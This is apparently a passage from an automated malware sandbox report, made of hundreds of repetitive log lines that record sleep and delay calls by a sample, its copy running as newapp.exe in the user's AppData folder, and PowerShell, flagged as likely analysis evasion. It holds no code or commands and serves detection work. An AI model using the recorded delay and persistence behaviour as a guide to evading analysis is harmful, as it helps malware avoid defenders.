                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598988Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598610Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598360Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598235Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598110Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597985Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597860Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597735Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597485Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597375Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597266Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596563Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596453Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596344Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596232Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596125Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596016Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595906Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595797Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595687Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595578Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595469Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595359Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595250Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595141Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595016Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594891Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594450Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594338Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599888
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599781
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599672
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599562
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599453
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599343
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599218
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 599109
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598999
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598834
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598685
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598578
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598468
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598358
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598250
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598140
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 598031
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597920
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597812
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597703
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597593
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597484
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597375
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597265
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597155
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 597046
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596937
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596828
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596718
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596609
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596500
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596390
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596280
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596121
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 596015
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595906
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595797
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595672
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595562
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595453
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595343
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595234
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595125
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 595015
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594906
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594797
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594672
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594562
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeThread delayed: delay time: 594453
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7106Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2557Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWindow / User API: threadDelayed 3093Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeWindow / User API: threadDelayed 6743Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 6630Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 3206Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 3997
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exeWindow / User API: threadDelayed 5853
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7372Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep count: 34 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7844Thread sleep count: 3093 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -599812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -599664s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -599365s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -599234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7844Thread sleep count: 6743 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -599123s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -599015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598344s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598234s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -598015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597358s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -597029s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596915s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596801s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596672s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596562s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596453s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596343s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596233s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596125s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -596015s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595906s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595578s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -595031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594919s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594797s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594687s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594576s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594468s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594329s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594207s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exe TID: 7836Thread sleep time: -594078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8008Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep count: 38 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8176Thread sleep count: 6630 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8176Thread sleep count: 3206 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599341s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -599110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598988s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598610s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598360s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -598110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597985s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597860s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597735s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597485s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597375s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597266s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597141s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -597031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596563s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596232s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -596016s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595359s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595141s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -595016s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -594891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -594781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -594672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -594562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -594450s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 8172Thread sleep time: -594338s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 2144Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep count: 37 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -34126476536362649s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep count: 3997 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599888s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7644Thread sleep count: 5853 > 30
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599781s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599218s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -599109s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598999s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598834s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598685s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598578s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598468s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598358s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598250s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598140s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -598031s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597920s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597812s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597703s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597593s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597484s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597375s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597265s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597155s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -597046s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596609s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596390s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596280s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596121s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -596015s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595906s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595797s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595672s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595562s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595453s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595343s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595234s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595125s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe TID: 7640Thread sleep time: -595015s >= -30000s
